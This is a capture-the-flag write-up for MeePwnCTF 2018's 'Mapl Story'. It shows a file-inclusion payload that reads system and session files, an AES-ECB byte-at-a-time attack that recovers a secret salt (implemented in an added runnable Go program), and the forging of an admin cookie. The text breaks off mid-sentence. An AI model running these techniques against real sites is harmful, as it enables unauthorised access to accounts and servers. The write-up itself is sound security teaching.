# Mapl Story

Mapl Story was part of the MeePwnCTF Quals 2018 and consists of a webpage
where you can name a "character" and teach a pet a command. You get the
source code, but the config is censored.

## Have a look around

First off, let's create an account, e.g. [email protected]/foobar123, and set any
name; we'll change that later.

Sign in and have a look at your cookies: you'll see your PHPSESSID and a
`_role`.  
`_role` is generated as either `sha256("admin".$salt)` or (in our case)
`sha256("user".$salt)`.  
Without the salt we can't forge the admin value, so recovering it is the next goal.

Have a look around the few pages on the site. The game page is completely
irrelevant, just a gimmick.

## File inclusion vulnerability

There is a file inclusion vulnerability in index.php; try e.g.
`/index.php?page=/etc/group`.  
Unfortunately the `page` GET parameter is heavily escaped, so for now there
isn't much we can do with this bug directly beyond reading files.

## Let's get salty

Let's have a look at `/index.php?page=/var/lib/php/sessions/sess_PHPSESSID`
(replace PHPSESSID with your own session ID).

You'll see a variable called `character_name`.  
`character_name` is AES-128-ECB encrypted data produced by
`openssl_encrypt($data.$salt,"AES-128-ECB",$key)`.  
Since AES-128-ECB encrypts each 16-byte block independently (identical
plaintext blocks give identical ciphertext blocks, no IV involved) and we
control the start of the plaintext (it's the character name you can update on
your settings page!), we can recover the salt byte by byte without ever
learning the key.

We start off by setting a character name like `AAAAAAAAAAAAAAA` (15x'A') and
note the first 32 characters (the first 16-byte block) of the encrypted value
in the session file. That block covers our 15 A's plus the first byte of the
salt. Now we try printable characters at the 16th position and compare the
first block each time; we find a match at `AAAAAAAAAAAAAAAm`, so we know the
salt starts with `m`. Next we do the same thing with `AAAAAAAAAAAAAA`
(14x'A'), note the first block again, and try characters at the 16th
position; the next match will be `AAAAAAAAAAAAAAms`.

We'll continue this until we finally get the salt: `ms_g00d_0ld_g4m3`.

## Becoming admin

Becoming admin now is as simple as writing the result of
`sha256("admin"."ms_g00d_0ld_g4m3")` into our `_role`  
cookie. After refreshing the page you'll see the admin link appearing in the
navigation bar.

`sha256("admin"."ms_g00d_0ld_g4m3") => a2ae9db7fd12a8911be74590b99bc7ad1f2f6ccd2e68e44afbf1280349205054`
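The salt recovery and the cookie forgery above, written out as a runnable added example (this is not code from the original writeup or the challenge). The `server` type is a local stand-in for the PHP `openssl_encrypt($data.$salt,"AES-128-ECB",$key)` call, playing the role of the session file; its key is made up, and it returns hex so one block is 32 characters, as in the text. `RecoverSalt` is the byte-at-a-time attack, generalised past the first block so it also works for salts longer than 16 bytes, and `RoleCookie` reproduces the `_role` value. The candidate `alphabet` is an assumption about which characters the salt may contain.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"strings"
)

// server stands in for the challenge's PHP encryption (assumption: the stored
// value is hex, so each 16-byte block is 32 characters). Both fields are
// secrets the attacker does not know.
type server struct {
	key  []byte
	salt []byte
}

// pkcs7Pad pads the way OpenSSL does for openssl_encrypt.
func pkcs7Pad(b []byte, size int) []byte {
	n := size - len(b)%size
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

// EncryptName is the oracle the session file exposes: hex(AES-128-ECB(name || salt)).
func (s server) EncryptName(name string) string {
	c, err := aes.NewCipher(s.key)
	if err != nil {
		panic(err)
	}
	pt := pkcs7Pad(append([]byte(name), s.salt...), aes.BlockSize)
	ct := make([]byte, len(pt))
	for i := 0; i < len(pt); i += aes.BlockSize {
		c.Encrypt(ct[i:i+aes.BlockSize], pt[i:i+aes.BlockSize])
	}
	return hex.EncodeToString(ct)
}

// Candidate bytes tried at each position (assumed to cover the salt's alphabet).
const alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-!$%&*+.=@^~"

// RecoverSalt recovers the secret appended after the attacker-controlled name,
// one byte at a time: pad the name so the next unknown byte becomes the last
// byte of a block, record that block as the target, then try every candidate
// in its place until the blocks match. It stops after maxLen bytes or when no
// candidate matches; at the end of the salt the plaintext length is 15 mod 16,
// so the byte in that position is the PKCS#7 pad 0x01, which is never printable.
func RecoverSalt(encrypt func(string) string, maxLen int) string {
	var known []byte
	for len(known) < maxLen {
		blk := len(known) / aes.BlockSize // block that holds the next unknown byte
		prefix := strings.Repeat("A", aes.BlockSize-1-len(known)%aes.BlockSize)
		lo, hi := blk*2*aes.BlockSize, (blk+1)*2*aes.BlockSize // hex offsets of that block
		target := encrypt(prefix)[lo:hi]
		matched := false
		for i := 0; i < len(alphabet); i++ {
			guess := prefix + string(known) + alphabet[i:i+1]
			if encrypt(guess)[lo:hi] == target {
				known = append(known, alphabet[i])
				matched = true
				break
			}
		}
		if !matched {
			break
		}
	}
	return string(known)
}

// RoleCookie reproduces the site's _role value, sha256(role . salt) as hex.
func RoleCookie(role, salt string) string {
	sum := sha256.Sum256([]byte(role + salt))
	return hex.EncodeToString(sum[:])
}

func main() {
	// Constructed secrets: the key is invented, the salt is the one the text recovers.
	srv := server{key: []byte("0123456789abcdef"), salt: []byte("ms_g00d_0ld_g4m3")}
	salt := RecoverSalt(srv.EncryptName, 32)
	fmt.Println("salt:", salt)
	fmt.Println("_role for admin:", RoleCookie("admin", salt))
}
```

Against the real target, `EncryptName` would be replaced by a function that updates the character name through the settings page and reads the new `character_name` back via the file inclusion; the comparison logic stays the same. Note that the attack needs no knowledge of the key at all, only the determinism of ECB.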

## Give yourself a pet

In the admin menu, give yourself a pet. This lets you train it commands on
the character page, which simply writes a text file to
`"uploads/".md5($salt.$email)."/command.txt"`.  
A lot of characters are filtered and you can only write 19 characters, so you
can't really do much with this alone.

19 characters is just barely long enough to fit a base64-encoded

Original writeup (http://blog.redrocket.club/2018/07/15/meepwn-quals-2018-maplstory/).